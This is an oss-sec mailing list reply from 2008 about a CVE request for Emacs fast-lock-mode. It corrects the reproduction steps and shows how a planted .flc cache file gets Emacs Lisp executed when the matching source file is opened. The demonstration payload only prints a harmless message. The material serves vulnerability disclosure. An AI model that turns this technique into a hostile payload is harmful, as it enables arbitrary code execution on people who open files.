oss-sec mailing list archives

Re: CVE request: Emacs 21 fast-lock-mode arbitrary lips code execution

From: Sven Joachim <svenjoac () gmx de>
Date: Wed, 14 May 2008 16:03:34 +0200

On 2008-05-14 15:27 +0200, Nico Golde wrote:

As I am a vim user I might have done something wrong too,
not sure. What I did after installing emacs:
cat >> ~/.emacs << EOF
(global-font-lock-mode t)
(seq font-lock-support-mode 'fast-lock-mode)
EOF

Should read setq, not seq.  You will also need to load fast-lock
explicitly before that, since it's obsolete and not automatically
loaded anymore:

(load-library "fast-lock")

cat >> foobar.c << EOF
/* no comment */
EOF

cat >> foobar.c.flc << EOF
" foobar "
EOF

Instead of " foobar ", you can put in the following which actually does
something visible:

(message "Surprise, surprise!")

This string will be put in the echo area when you visit foobar.c.

Sven